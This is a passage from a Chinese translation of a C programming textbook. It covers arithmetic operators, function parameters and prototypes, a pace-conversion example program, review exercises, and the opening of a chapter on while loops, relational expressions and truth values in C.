程序员必须承担使用的风险和责任。 总结 C的一些运算符 下面是我们学过的一些运算符。 赋值运算符: = 将其右侧的值赋给左侧的变量 算术运算符: +    将其左侧的值与右侧的值相加 -    将其左侧的值减去右侧的值 -    作为一元运算符,改变其右侧值的符号 *    将其左侧的值乘以右侧的值 /    将其左侧的值除以右侧的值,如果两数都是整数,计算结果 将被截断 %    当其左侧的值除以右侧的值时,取其余数(只能应用于整 数) 291 ++    对其右侧的值加1(前缀模式),或对其左侧的值加1(后缀 模式) --    对其右侧的值减1(前缀模式),或对其左侧的值减1(后缀模 式) 其他运算符: sizeof    获得其右侧运算对象的大小(以字节为单位),运算对象 可以是一个被圆括号括起来的类型说明符,如sizeof(float),或者是一个具体 的变量名、数组名等,如sizeof foo (类型名)   强制类型转换运算符将其右侧的值转换成圆括号中指定 的类型,如(float)9把整数9转换成浮点数9.0 292 5.6 带参数的函数 现在,相信读者已经熟悉了带参数的函数。要掌握函数,还要学习如何 编写自己的函数(在此之前,读者可能要复习一下程序清单2.3中的butler() 函数,该函数不带任何参数)。程序清单5.15中有一个pound()函数,打印指 定数量的#号(该符号也叫作编号符号或井号)。该程序还演示了类型转换 的应用。 程序清单5.15 pound.c程序 /* pound.c -- 定义一个带一个参数的函数 */ #include <stdio.h> void pound(int n);// ANSI函数原型声明 int main(void) { int times = 5; char ch = '!';   // ASCII码是33 float f = 6.0f; pound(times);   // int类型的参数 pound(ch);     // 和pound((int)ch);相同 pound(f);      // 和pound((int)f);相同 return 0; } 293 void pound(int n)   // ANSI风格函数头 {             // 表明该函数接受一个int类型的参数 while (n-- > 0) printf("#"); printf("\n"); } 运行该程序后,输出如下: ##### ################################# ###### 首先,看程序的函数头: void pound(int n) 如果函数不接受任何参数,函数头的圆括号中应该写上关键字 void。 由于该函数接受一个 int 类型的参数,所以圆括号中包含一个int类型变量n的 声明。参数名应遵循C语言的命名规则。 声明参数就创建了被称为形式参数(formal argument或formal parameter,简称形参)的变量。该例中,形式参数是 int 类型的变量 n。像 pound(10)这样的函数调用会把 10 赋给 n。在该程序中,调用pound(times)就 是把 times 的值(5)赋给 n。我们称函数调用传递的值为实际参数(actual argument或actual parameter),简称实参。所以,函数调用pound(10)把实际 参数10传递给函数,然后该函数把10赋给形式参数(变量n)。也就是说, main()中的变量times的值被拷贝给pound()中的新变量n。 294 注意 实参和形参 在英文中,argument和parameter经常可以互换使用,但是C99标准规定 了:对于actual argument或actual parameter使用术语argument(译为实参); 对于formal argument或formal parameter使用术语parameter(译为形参)。为 遵循这一规定,我们可以说形参是变量,实参是函数调用提供的值,实参被 赋给相应的形参。因此,在程序清单5.15中,times是pound()的实参,n是 pound()的形参。类似地,在函数调用pound(times + 4)中,表达式times + 4的 值是该函数的实参。 变量名是函数私有的,即在函数中定义的函数名不会和别处的相同名称 发生冲突。如果在pound()中用times代替n,那么这个times与main()中的times 不同。也就是说,程序中出现了两个同名的变量,但是程序可以区分它们。 现在,我们来学习函数调用。第1 个函数调用是pound(times),times的 值5被赋给n。因此, printf()函数打印了5个井号和1个换行符。第2个函数调 用是pound(ch)。这里,ch是char类型,被初始化为!字符,在ASCII中ch的数 值是33。但是pound()函数的参数类型是int,与char不匹配。程序开头的函数 原型在这里发挥了作用。原型(prototype)即是函数的声明,描述了函数的 返回值和参数。pound()函数的原型说明了两点: 该函数没有返回值(函数名前面有void关键字); 该函数有一个int类型的参数。 该例中,函数原型告诉编译器pound()需要一个int类型的参数。相应 地,当编译器执行到pound(ch)表达式时,会把参数ch自动转换成int类型。在 我们的系统中,该参数从1字节的33变成4字节的33,所以现在33的类型满足 函数的要求。与此类似,最后一次调用是pound(f),使得float类型的变量被 转换成合适的类型。 在ANSI C之前,C使用的是函数声明,而不是函数原型。函数声明只指 明了函数名和返回类型,没有指明参数类型。为了向下兼容,C现在仍然允 295 许这样的形式: void pound(); /* ANSI C乊前的函数声明 */ 如果用这条函数声明代替pound.c程序中的函数原型会怎样?第 1 次函 数调用,pound(times)没问题,因为times是int类型。第2次函数调用, pound(ch)也没问题,因为即使缺少函数原型,C也会把char和short类型自动 升级为int类型。第3次函数调用,pound(f)会失败,因为缺少函数原型,float 会被自动升级为 double,这没什么用。虽然程序仍然能运行,但是输出的内 容不正确。在函数调用中显式使用强制类型转换,可以修复这个问题: pound ((int)f); // 把f强制类型转换为正确的类型 注意,如果f的值太大,超过了int类型表示的范围,这样做也不行。 296 5.7 示例程序 程序清单5.16演示了本章介绍的几个概念,这个程序对某些人很有用。 程序看起来很长,但是所有的计算都在程序的后面几行中。我们尽量使用大 量的注释,让程序看上去清晰明了。请通读该程序,稍后我们会分析几处要 点。 程序清单5.16 running.c程序 // running.c -- A useful program for runners #include <stdio.h> const int S_PER_M = 60;        // 1分钟的秒数 const int S_PER_H = 3600;      // 1小时的分钟数 const double M_PER_K = 0.62137;   // 1公里的英里数 int main(void) { double distk, distm;  // 跑过的距离(分别以公里和英里为单位) double rate;       // 平均速度(以英里/小时为单位) int min, sec;      // 跑步用时(以分钟和秒为单位) int time;        // 跑步用时(以秒为单位) double mtime;      // 跑1英里需要的时间,以秒为单位 int mmin, msec;     // 跑1英里需要的时间,以分钟和秒为单位 printf("This program converts your time for a metric race\n"); 297 printf("to a time for running a mile and to your average\n"); printf("speed in miles per hour.\n"); printf("Please enter, in kilometers, the distance run.\n"); scanf("%lf", &distk);      // %lf表示读取一个double类型的值 printf("Next enter the time in minutes and seconds.\n"); printf("Begin by entering the minutes.\n"); scanf("%d", &min); printf("Now enter the seconds.\n"); scanf("%d", &sec); time = S_PER_M * min + sec;   // 把时间转换成秒 distm = M_PER_K * distk;    // 把公里转换成英里 rate = distm / time * S_PER_H; // 英里/秒×秒/小时 = 英里/小时 mtime = (double) time / distm; // 时间/距离 = 跑1英里所用的时间 mmin = (int) mtime / S_PER_M;  // 求出分钟数 msec = (int) mtime % S_PER_M;  // 求出剩余的秒数 printf("You ran %1.2f km (%1.2f miles) in %d min, %d  sec.\n", distk, distm, min, sec); printf("That pace corresponds to running a mile in %d  min, ", 298 mmin); printf("%d sec.\nYour average speed was %1.2f mph.\n", msec, rate); return 0; } 程序清单5.16使用了min_sec程序(程序清单5.9)中的方法把时间转换 成分钟和秒,除此之外还使用了类型转换。为什么要进行类型转换?因为程 序在秒转换成分钟的部分需要整型参数,但是在公里转换成英里的部分需要 浮点运算。我们使用强制类型转换运算符进行了显式转换。 实际上,我们曾经利用自动类型转换编写这个程序,即使用int类型的 mtime来强制时间计算转换成整数形式。但是,在测试的11个系统中,这个 版本的程序在1个系统上无法运行,这是由于编译器(版本比较老)没有遵 循C规则。而使用强制类型转换就没有问题。对读者而言,强制类型转换强 调了转换类型的意图,对编译器而言也是如此。 下面是程序清单5.16的输出示例: This program converts your time for a metric race to a time for running a mile and to your average speed in miles per hour. Please enter, in kilometers, the distance run. 10.0 Next enter the time in minutes and seconds. Begin by entering the minutes. 299 36 Now enter the seconds. 23 You ran 10.00 km (6.21 miles) in 36 min, 23 sec. That pace corresponds to running a mile in 5 min, 51 sec. Your average speed was 10.25 mph. 300 5.8 关键概念 C 通过运算符提供多种操作。每个运算符的特性包括运算对象的数量、 优先级和结合律。当两个运算符共享一个运算对象时,优先级和结合律决定 了先进行哪项运算。每个 C表达式都有一个值。如果不了解运算符的优先级 和结合律,写出的表达式可能不合法或者表达式的值与预期不符。这会影响 你成为一名优秀的程序员。 虽然C允许编写混合数值类型的表达式,但是算术运算要求运算对象都 是相同的类型。因此,C会进行自动类型转换。尽管如此,不要养成依赖自 动类型转换的习惯,应该显式选择合适的类型或使用强制类型转换。这样, 就不用担心出现不必要的自动类型转换。 301 5.9 本章小结 C 语言有许多运算符,如本章讨论的赋值运算符和算术运算符。一般而 言,运算符需要一个或多个运算对象才能完成运算生成一个值。只需要一个 运算对象的运算符(如负号和 sizeof)称为一元运算符,需要两个运算对象 的运算符(如加法运算符和乘法运算符)称为二元运算符。 表达式由运算符和运算对象组成。在C语言中,每个表达式都有一个 值,包括赋值表达式和比较表达式。运算符优先级规则决定了表达式中各项 的求值顺序。当两个运算符共享一个运算对象时,先进行优先级高的运算。 如果运算符的优先级相等,由结合律(从左往右或从右往左)决定求值顺 序。 大部分语句都以分号结尾。最常用的语句是表达式语句。用花括号括起 来的一条或多条语句构成了复合语句(或称为块)。while语句是一种迭代 语句,只要测试条件为真,就重复执行循环体中的语句。 在C语言中,许多类型转换都是自动进行的。当char和short类型出现在 表达式里或作为函数的参数(函数原型除外)时,都会被升级为int类型; float类型在函数参数中时,会被升级为double类型。在K&R C(不是ANSI C)下,表达式中的float也会被升级为double类型。当把一种类型的值赋给 另一种类型的变量时,值将被转换成与变量的类型相同。当把较大类型转换 成较小类型时(如,long转换成short,或 double 转换成 float),可能会丢失 数据。根据本章介绍的规则,在混合类型的运算中,较小类型会被转换成较 大类型。 定义带一个参数的函数时,便在函数定义中声明了一个变量,或称为形 式参数。然后,在函数调用中传入的值会被赋给这个变量。这样,在函数中 就可以使用该值了。 302 5.10 复习题 复习题的参考答案在附录A中。 1.假设所有变量的类型都是int,下列各项变量的值是多少: a.x = (2 + 3) * 6; b.x = (12 + 6)/2*3; c.y = x = (2 + 3)/4; d.y = 3 + 2*(x = 7/2); 2.假设所有变量的类型都是int,下列各项变量的值是多少: a.x = (int)3.8 + 3.3; b.x = (2 + 3) * 10.5; c.x = 3 / 5 * 22.0; d.x = 22.0 * 3 / 5; 3.对下列各表达式求值: a.30.0 / 4.0 * 5.0; b.30.0 / (4.0 * 5.0); c.30 / 4 * 5; d.30 * 5 / 4; e.30 / 4.0 * 5; f.30 / 4 * 5.0; 303 4.请找出下面的程序中的错误。 int main(void) { int i = 1, float n; printf("Watch out! Here come a bunch of fractions!\n"); while (i < 30) n = 1/i; printf(" %f", n); printf("That's all, folks!\n"); return; } 5.这是程序清单 5.9 的另一个版本。从表面上看,该程序只使用了一条 scanf()语句,比程序清单5.9简单。请找出不如原版之处。 #include <stdio.h> #define S_TO_M 60 int main(void) { int sec, min, left; 304 printf("This program converts seconds to minutes and "); printf("seconds.\n"); printf("Just enter the number of seconds.\n"); printf("Enter 0 to end the program.\n"); while (sec > 0) { scanf("%d", &sec); min = sec/S_TO_M; left = sec % S_TO_M; printf("%d sec is %d min, %d sec. \n", sec, min, left); printf("Next input?\n"); } printf("Bye!\n"); return 0; } 6.下面的程序将打印出什么内容? #include <stdio.h> #define FORMAT "%s! C is cool!\n" int main(void) { 305 int num = 10; printf(FORMAT,FORMAT); printf("%d\n", ++num); printf("%d\n", num++); printf("%d\n", num--); printf("%d\n", num); return 0; } 7.下面的程序将打印出什么内容? #include <stdio.h> int main(void) { char c1, c2; int diff; float num; c1 = 'S'; c2 = 'O'; diff = c1 - c2; num = diff; 306 printf("%c%c%c:%d %3.2f\n", c1, c2, c1, diff, num); return 0; } 8.下面的程序将打印出什么内容? #include <stdio.h> #define TEN 10 int main(void) { int n = 0; while (n++ < TEN) printf("%5d", n); printf("\n"); return 0; } 9.修改上一个程序,使其可以打印字母a~g。 10.假设下面是完整程序中的一部分,它们分别打印什么? a. int x = 0; while (++x < 3) 307 printf("%4d", x); b. int x = 100; while (x++ < 103) printf("%4d\n",x); printf("%4d\n",x); c. char ch = 's'; while (ch < 'w') { printf("%c", ch); ch++; } printf("%c\n",ch); 11.下面的程序会打印出什么? #define MESG "COMPUTER BYTES DOG" #include <stdio.h> int main(void) { 308 int n = 0; while ( n < 5 ) printf("%s\n", MESG); n++; printf("That's all.\n"); return 0; } 12.分别编写一条语句,完成下列各任务(或者说,使其具有以下副作 用): a.将变量x的值增加10 b.将变量x的值增加1 c.将a与b之和的两倍赋给c d.将a与b的两倍之和赋给c 13.分别编写一条语句,完成下列各任务: a.将变量x的值减少1 b.将n除以k的余数赋给m c.q除以b减去a,并将结果赋给p d.a与b之和除以c与d的乘积,并将结果赋给x 309 5.11 编程练习 1.编写一个程序,把用分钟表示的时间转换成用小时和分钟表示的时 间。使用#define或const创建一个表示60的符号常量或const变量。通过while 循环让用户重复输入值,直到用户输入小于或等于0的值才停止循环。 2.编写一个程序,提示用户输入一个整数,然后打印从该数到比该数大 10的所有整数(例如,用户输入5,则打印5~15的所有整数,包括5和 15)。要求打印的各值之间用一个空格、制表符或换行符分开。 3.编写一个程序,提示用户输入天数,然后将其转换成周数和天数。例 如,用户输入18,则转换成2周4天。以下面的格式显示结果: 18 days are 2 weeks, 4 days. 通过while循环让用户重复输入天数,当用户输入一个非正值时(如0 或-20),循环结束。 4.编写一个程序,提示用户输入一个身高(单位:厘米),并分别以厘 米和英寸为单位显示该值,允许有小数部分。程序应该能让用户重复输入身 高,直到用户输入一个非正值。其输出示例如下: Enter a height in centimeters: 182 182.0 cm = 5 feet, 11.7 inches Enter a height in centimeters (<=0 to quit): 168.7 168.0 cm = 5 feet, 6.4 inches Enter a height in centimeters (<=0 to quit): 0 bye 5.修改程序addemup.c(程序清单5.13),你可以认为addemup.c是计算20 310 天里赚多少钱的程序(假设第1天赚$1、第2天赚$2、第3天赚$3,以此类 推)。修改程序,使其可以与用户交互,根据用户输入的数进行计算(即, 用读入的一个变量来代替20)。 6.修改编程练习5的程序,使其能计算整数的平方和(可以认为第1天赚 $1、第2天赚$4、第3天赚$9,以此类推,这看起来很不错)。C没有平方函 数,但是可以用n * n来表示n的平方。 7.编写一个程序,提示用户输入一个double类型的数,并打印该数的立 方值。自己设计一个函数计算并打印立方值。main()函数要把用户输入的值 传递给该函数。 8.编写一个程序,显示求模运算的结果。把用户输入的第1个整数作为 求模运算符的第2个运算对象,该数在运算过程中保持不变。用户后面输入 的数是第1个运算对象。当用户输入一个非正值时,程序结束。其输出示例 如下: This program computes moduli. Enter an integer to serve as the second operand: 256 Now enter the first operand: 438 438 % 256 is 182 Enter next number for first operand (<= 0 to quit): 1234567 1234567 % 256 is 135 Enter next number for first operand (<= 0 to quit): 0 Done 9.编写一个程序,要求用户输入一个华氏温度。程序应读取double类型 的值作为温度值,并把该值作为参数传递给一个用户自定义的函数 311 Temperatures()。该函数计算摄氏温度和开氏温度,并以小数点后面两位数字 的精度显示3种温度。要使用不同的温标来表示这3个温度值。下面是华氏温 度转摄氏温度的公式: 摄氏温度 = 5.0 / 9.0 * (华氏温度 - 32.0) 开氏温标常用于科学研究,0表示绝对零,代表最低的温度。下面是摄 氏温度转开氏温度的公式: 开氏温度 = 摄氏温度 + 273.16 Temperatures()函数中用const创建温度转换中使用的变量。在main()函数 中使用一个循环让用户重复输入温度,当用户输入 q 或其他非数字时,循环 结束。scanf()函数返回读取数据的数量,所以如果读取数字则返回1,如果 读取q则不返回1。可以使用==运算符将scanf()的返回值和1作比较,测试两 值是否相等。 [1].根据C标准,声明不是语句。这与C++有所不同。——译者注 [2].在C语言中,赋值和函数调用都是表达式。没有所谓的“赋值语句”和“函 数调用语句”,这些语句实际上都是表达式语句。本书将“assignment statement”均译为“赋值表达式语句”,以提醒读者注意。——译者注 312 第6章 C控制语句:循环 本章介绍以下内容: 关键字:for、while、do while 运算符:<、>、>=、<=、!=、==、+=、*=、-=、/=、%= 函数:fabs() C语言有3种循环:for、while、do while 使用关系运算符构建控制循环的表达式 其他运算符 循环常用的数组 编写有返回值的函数 大多数人都希望自己是体格强健、天资聪颖、多才多艺的能人。虽然有 时事与愿违,但至少我们用 C能写出这样的程序。诀窍是控制程序流。对于 计算机科学(是研究计算机,不是用计算机做研究)而言,一门语言应该提 供以下3种形式的程序流: 执行语句序列; 如果满足某些条件就重复执行语句序列(循环 通过测试选择执行哪一个语句序列(分支)。 读者对第一种形式应该很熟悉,前面学过的程序中大部分都是由语句序 列组成。while循环属于第二种形式。本章将详细讲解while循环和其他两种 循环:for和do while。第三种形式用于在不同的执行方案之间进行选择,让 313 程序更“智能”,且极大地提高了计算机的用途。不过,要等到下一章才介绍 这部分的内容。本章还将介绍数组,可以把新学的知识应用在数组上。另 外,本章还将继续介绍函数的相关内容。首先,我们从while循环开始学 习。 314 6.1 再探while循环 经过上一章的学习,读者已经熟悉了 while 循环。这里,我们用一个程 序来回顾一下,程序清单 6.1根据用户从键盘输入的整数进行求和。程序利 用了scanf()的返回值来结束循环。 程序清单6.1 summing.c程序 /* summing.c -- 根据用户键入的整数求和 */ #include <stdio.h> int main(void) { long num; long sum = 0L;     /* 把sum初始化为0 */ int status; printf("Please enter an integer to be summed "); printf("(q to quit): "); status = scanf("%ld", &num); while (status == 1)  /* == 的意思是“等于” */ { sum = sum + num; printf("Please enter next integer (q to quit): "); 315 status = scanf("%ld", &num); } printf("Those integers sum to %ld.\n", sum); return 0; } 该程序使用long类型以储存更大的整数。尽管C编译器会把0自动转换为 合适的类型,但是为了保持程序的一致性,我们把sum初始化为0L(long类 型的0),而不是0(int类型的0)。 该程序的运行示例如下: Please enter an integer to be summed (q to quit): 44 Please enter next integer (q to quit): 33 Please enter next integer (q to quit): 88 Please enter next integer (q to quit): 121 Please enter next integer (q to quit): q Those integers sum to 286. 6.1.1 程序注释 先看while循环,该循环的测试条件是如下表达式: status == 1 ==运算符是C的相等运算符(equality operator),该表达式判断status是 否等于1。不要把status== 1与status = 1混淆,后者是把1赋给status。根据测试 316 条件status == 1,只要status等于1,循环就会重复。每次循环,num的当前值 都被加到sum上,这样sum的值始终是当前整数之和。当status的值不为1时, 循环结束。然后程序打印sum的最终值。 要让程序正常运行,每次循环都要获取num的一个新值,并重置status。 程序利用scanf()的两个不同的特性来完成。首先,使用scanf()读取num的一 个新值;然后,检查scanf()的返回值判断是否成功获取值。第4章中介绍 过,scanf()返回成功读取项的数量。如果scanf()成功读取一个整数,就把该 数存入num并返回1,随后返回值将被赋给status(注意,用户输入的值储存 在num中,不是status中)。这样做同时更新了num和status的值,while循环进 入下一次迭代。如果用户输入的不是数字(如, q),scanf()会读取失败并 返回0。此时,status的值就是0,循环结束。因为输入的字符q不是数字,所 以它会被放回输入队列中(实际上,不仅仅是 q,任何非数值的数据都会导 致循环终止,但是提示用户输入q退出程序比提示用户输入一个非数字字符 要简单)。 如果 scanf()在转换值之前出了问题(例如,检测到文件结尾或遇到硬件 问题),会返回一个特殊值EOF(其值通常被定义为-1)。这个值也会引起 循环终止。 如何告诉循环何时停止?该程序利用 scanf()的双重特性避免了在循环中 交互输入时的这个棘手的问题。例如,假设scanf()没有返回值,那么每次循 环只会改变num的值。虽然可以使用num的值来结束循环,比如把num > 0(num大于0)或num != 0(num不等于0)作为测试条件,但是这样用户就 不能输入某些值,如-3或0。也可以在循环中添加代码,例如每次循环时询 问用户“是否继续循环?<y/n>”,然后判断用户是否输入y。这个方法有些笨 拙,而且还减慢了输入的速度。使用scanf()的返回值,轻松地避免了这些问 题。 现在,我们来看看该程序的结构。总结如下: 把sum初始化为0 317 提示用户输入数据 读取用户输入的数据 当输入的数据为整数时, 输入添加给sum, 提示用户进行输入, 然后读取下一个输入 输入完成后,打印sum的值 顺带一提,这叫作伪代码(pseudocode),是一种用简单的句子表示程 序思路的方法,它与计算机语言的形式相对应。伪代码有助于设计程序的逻 辑。确定程序的逻辑无误之后,再把伪代码翻译成实际的编程代码。使用伪 代码的好处之一是,可以把注意力集中在程序的组织和逻辑上,不用在设计 程序时还要分心如何用编程语言来表达自己的想法。例如,可以用缩进来代 表一块代码,不用考虑C的语法要用花括号把这部分代码括起来。 总之,因为while循环是入口条件循环,程序在进入循环体之前必须获 取输入的数据并检查status的值,所以在 while 前面要有一个 scanf()。要让循 环继续执行,在循环内需要一个读取数据的语句,这样程序才能获取下一个 status的值,所以在while循环末尾还要有一个scanf(),它为下一次迭代做好 了准备。可以把下面的伪代码作为while循环的标准格式: 获得第1个用于测试的值 当测试为真时 处理值 获取下一个值 318 6.1.2 C风格读取循环 根据伪代码的设计思路,程序清单6.1可以用Pascal、BASIC或 FORTRAN来编写。但是C更为简洁,下面的代码: status = scanf("%ld", &num); while (status == 1) { /* 循环行为 */ status = scanf("%ld", &num); } 可以用这些代码替换: while (scanf("%ld", &num) == 1) { /*循环行为*/ } 第二种形式同时使用scanf()的两种不同的特性。首先,如果函数调用成 功,scanf()会把一个值存入num。然后,利用scanf()的返回值(0或1,不是 num的值)控制while循环。因为每次迭代都会判断循环的条件,所以每次迭 代都要调用scanf()读取新的num值来做判断。换句话说,C的语法特性让你可 以用下面的精简版本替换标准版本: 当获取值和判断值都成功 处理该值 319 接下来,我们正式地学习while语句。 320 6.2 while语句 while循环的通用形式如下: while ( expression ) statement statement部分可以是以分号结尾的简单语句,也可以是用花括号括起来 的复合语句。 到目前为止,程序示例中的expression部分都使用关系表达式。也就是 说,expression是值之间的比较,可以使用任何表达式。如果expression为真 (或者更一般地说,非零),执行 statement部分一次,然后再次判断 expression。在expression为假(0)之前,循环的判断和执行一直重复进行。 每次循环都被称为一次迭代(iteration),如图6.1所示。 图6.1 while循环的结构 6.2.1 终止while循环 321 while循环有一点非常重要:在构建while循环时,必须让测试表达式的 值有变化,表达式最终要为假。否则,循环就不会终止(实际上,可以使用 break和if语句来终止循环,但是你尚未学到)。考虑下面的例子: index = 1; while (index < 5) printf("Good morning!\n"); 上面的程序段将打印无数次 。为什么?因为循环中 index的值一直都是原来的值1,不曾变过。现在,考虑下面的程序段: 这段程序也好不到哪里去。虽然改变了index的值,但是改错了!不 过,这个版本至少在index减少到其类型到可容纳的最小负值并变成最大正 值时会终止循环(第3章3.4.2节中的toobig.c程序解释过,最大正值加1一般 会得到一个负值;类似地,最小负值减1一般会得到最大正值)。 6.2.2 何时终止循环 要明确一点:只有在对测试条件求值时,才决定是终止还是继续循环。 例如,考虑程序清单6.2中的程序。 程序清单6.2 when.c程序 // when.c -- 何时退出循环 #include <stdio.h> int main(void) 322 { int n = 5; while (n < 7)           // 第7行 { printf("n = %d\n", n); n++;              // 第10行 printf("Now n = %d\n", n); // 第11行 } printf("The loop has finished.\n"); return 0; } 运行程序清单6.2,输出如下: n = 5 Now n = 6 n = 6 Now n = 7 The loop has finished. 在第2次循环时,变量n在第10行首次获得值7。但是,此时程序并未退 出,它结束本次循环(第11行),并在对第7行的测试条件求值时才退出循 环(变量n在第1次判断时为5,第2次判断时为6)。 323 6.2.3 while:入口条件循环 while循环是使用入口条件的有条件循环。所谓“有条件”指的是语句部 分的执行取决于测试表达式描述的条件,如(index < 5)。该表达式是一个入 口条件(entry condition),因为必须满足条件才能进入循环体。在下面的情 况中,就不会进入循环体,因为条件一开始就为假: index = 10; while (index++ < 5) printf("Have a fair day or better.\n"); 把第1行改为: index = 3; 就可以运行这个循环了。 6.2.4 语法要点 使用while时,要牢记一点:只有在测试条件后面的单独语句(简单语 句或复合语句)才是循环部分。程序清单6.3演示了忽略这点的后果。缩进 是为了让读者阅读方便,不是计算机的要求。 程序清单6.3 while1.c程序 /* while1.c -- 注意花括号的使用 */ /* 糟糕的代码创建了一个无限循环 */ #include <stdio.h> int main(void) { 324 int n = 0; while (n < 3) printf("n is %d\n", n); n++; printf("That's all this program does\n"); return 0; } 该程序的输出如下: n is 0 n is 0 n is 0 n is 0 n is 0 ... 屏幕上会一直输出以上内容,除非强行关闭这个程序。 虽然程序中缩进了n++;这条语句,但是并未把它和上一条语句括在花括 号内。因此,只有直接跟在测试条件后面的一条语句是循环的一部分。变量 n的值不会改变,条件n < 3一直为真。该循环会一直打印n is 0,除非强行关 闭程序。这是一个无限循环(infinite loop)的例子,没有外部干涉就不会退 出。 325 记住,即使while语句本身使用复合语句,在语句构成上,它也是一条 单独的语句。该语句从while开始执行,到第1个分号结束。在使用了复合语 句的情况下,到右花括号结束。 要注意放置分号的位置。例如,考虑程序清单6.4。 程序清单6.4 while2.c程序 /* while2.c -- 注意分号的位置 */ #include <stdio.h> int main(void) { int n = 0; while (n++ < 3);      /* 第7行 */ printf("n is %d\n", n); /* 第8行 */ printf("That's all this program does.\n"); return 0; } 该程序的输出如下: n is 4 That's all this program does. 如前所述,循环在执行完测试条件后面的第 1 条语句(简单语句或复合 语句)后进入下一轮迭代,直到测试条件为假才会结束。该程序中第7行的 326 测试条件后面直接跟着一个分号,循环在此进入下一轮迭代,因为单独一个 分号被视为一条语句。虽然n的值在每次循环时都递增1,但是第8行的语句 不是循环的一部分,因此只会打印一次循环结束后的n值。 在该例中,测试条件后面的单独分号是空语句(null statement),它什 么也不做。在C语言中,单独的分号表示空语句。有时,程序员会故意使用 带空语句的while语句,因为所有的任务都在测试条件中完成了,不需要在 循环体中做什么。例如,假设你想跳过输入到第1个非空白字符或数字,可 以这样写: while (scanf("%d", &num) == 1) ; /* 跳过整数输入 */ 只要scanf()读取一个整数,就会返回1,循环继续执行。注意,为了提 高代码的可读性,应该让这个分号独占一行,不要直接把它放在测试表达式 同行。这样做一方面让读者更容易看到空语句,一方面也提醒自己和读者空 语句是有意而为之。处理这种情况更好的方法是使用下一章介绍的continue 语句。 327 6.3 用关系运算符和表达式比较大小 while循环经常依赖测试表达式作比较,这样的表达式被称为关系表达 式(relational expression),出现在关系表达式中间的运算符叫做关系运算 符(relational operator)。前面的示例中已经用过一些关系运算符,表 6.1 列出了 C 语言的所有关系运算符。该表也涵盖了所有的数值关系(数字之 间的关系再复杂也没有人与人之间的关系复杂)。 表6.1 关系运算符 关系运算符常用于构造while语句和其他C语句(稍后讨论)中用到的关 系表达式。这些语句都会检查关系表达式为真还是为假。下面有3个互不相 关的while语句,其中都包含关系表达式。 while (number < 6) { printf("Your number is too small.\n"); scanf("%d", &number); } while (ch != '$') { 328 count++; scanf("%c", &ch); } while (scanf("%f", &num) == 1) sum = sum + num; 注意,第2个while语句的关系表达式还可用于比较字符。比较时使用的 是机器字符码(假定为ASCII)。但是,不能用关系运算符比较字符串。第 11章将介绍如何比较字符串。 虽然关系运算符也可用来比较浮点数,但是要注意:比较浮点数时,尽 量只使用<和>。因为浮点数的舍入误差会导致在逻辑上应该相等的两数却 不相等。例如,3乘以1/3的积是1.0。如果用把1/3表示成小数点后面6位数 字,乘积则是.999999,不等于1。使用fabs()函数(声明在math.h头文件中) 可以方便地比较浮点数,该函数返回一个浮点值的绝对值(即,没有代数符 号的值)。例如,可以用类似程序清单6.5的方法来判断一个数是否接近预 期结果。 程序清单6.5 cmpflt.c程序 // cmpflt.c -- 浮点数比较 #include <math.h> #include <stdio.h> int main(void) { const double ANSWER = 3.14159; 329 double response; printf("What is the value of pi?\n"); scanf("%lf", &response); while (fabs(response - ANSWER) > 0.0001) { printf("Try again!\n"); scanf("%lf", &response); } printf("Close enough!\n"); return 0; } 循环会一直提示用户继续输入,除非用户输入的值与正确值之间相差 0.0001: What is the value of pi? 3.14 Try again! 3.1416 Close enough! 6.3.1 什么是真 330 这是一个古老的问题,但是对C而言还不算难。在C中,表达式一定有 一个值,关系表达式也不例外。程序清单6.6中的程序用于打印两个关系表 达式的值,一个为真,一个为假。 程序清单6.6 t_and_f.c程序 /* t_and_f.c -- C中的真和假的值 */ #include <stdio.h> int main(void) { int true_val, false_val; true_val = (10 > 2);    // 关系为真的值 false_val = (10 == 2); // 关系为假的值 printf("true = %d; false = %d \n", true_val, false_val); return 0; } 程序清单6.6把两个关系表达式的值分别赋给两个变量,即把表达式为 真的值赋给true_val,表达式为假的值赋给false_val。运行该程序后输出如 下: true = 1; false = 0 原来如此!对C而言,表达式为真的值是1,表达式为假的值是0。一些 C程序使用下面的循环结构,由于1为真,所以循环会一直进行。 while (1) 331 { ... } 6.3.2 其他真值 既然1或0可以作为while语句的测试表达式,是否还可以使用其他数 字?如果可以,会发生什么?我们用程序清单6.7来做个实验。 程序清单6.7 truth.c程序 // truth.c -- 哪些值为真 #include <stdio.h> int main(void) { int n = 3; while (n) printf("%2d is true\n", n--); printf("%2d is false\n", n); n = -3; while (n) printf("%2d is true\n", n++); printf("%2d is false\n", n); 332 return 0; } 该程序的输出如下: 3 is true 2 is true 1 is true 0 is false -3 is true -2 is true -1 is true 0 is false 执行第1个循环时,n分别是3、2、1,当n等于0时,第1个循环结束。与 此类似,执行第2个循环时,n分别是-3、-2和-1,当n等于0时,第2个循环结 束。一般而言,所有的非零值都视为真,只有0被视为假。在C中,真的概 念还真宽! 也可以说,只要测试条件的值为非零,就会执行 while 循环。这是从数 值方面而不是从真/假方面来看测试条件。要牢记:关系表达式为真,求值 得1;关系表达式为假,求值得0。因此,这些表达式实际上相当于数值。 许多C程序员都会很好地利用测试条件的这一特性。例如,用while (goats)替换while (goats !=0),因为表达式goats != 0和goats都只有在goats的值 为0时才为0或假。第1种形式(while (goats != 0))对初学者而言可能比较清 楚,但是第2种形式(while (goats))才是C程序员最常用的。要想成为一名 333 C程序员,应该多熟悉while (goats)这种形式。 6.3.3 真值的问题 C对真的概念约束太少会带来一些麻烦。例如,我们稍微修改一下程序 清单6.1,修改后的程序如程序清单6.8所示。 程序清单6.8 trouble.c程序 // trouble.c -- 误用=会导致无限循环 #include <stdio.h> int main(void) { long num; long sum = 0L; int status; printf("Please enter an integer to be summed "); printf("(q to quit): "); status = scanf("%ld", &num); while (status = 1) { sum = sum + num; printf("Please enter next integer (q to quit): "); 334 status = scanf("%ld", &num); } printf("Those integers sum to %ld.\n", sum); return 0; } 运行该程序,其输出如下: Please enter an integer to be summed (q to quit): 20 Please enter next integer (q to quit): 5 Please enter next integer (q to quit): 30 Please enter next integer (q to quit): q Please enter next integer (q to quit): Please enter next integer (q to quit): Please enter next integer (q to quit): Please enter next integer (q to quit): („„屏幕上会一直显示最后的提示内容,除非强行关闭程序。也许你根 本不想运行这个示例。) 这个麻烦的程序示例改动了while循环的测试条件,把status == 1替换成 status = 1。后者是一个赋值表达式语句,所以 status 的值为 1。而且,整个 赋值表达式的值就是赋值运算符左侧的值,所以status = 1的值也是1。这 里,while (status = 1)实际上相当于while (1),也就是说,循环不会退出。虽 然用户输入q,status被设置为0,但是循环的测试条件把status又重置为1,进 335 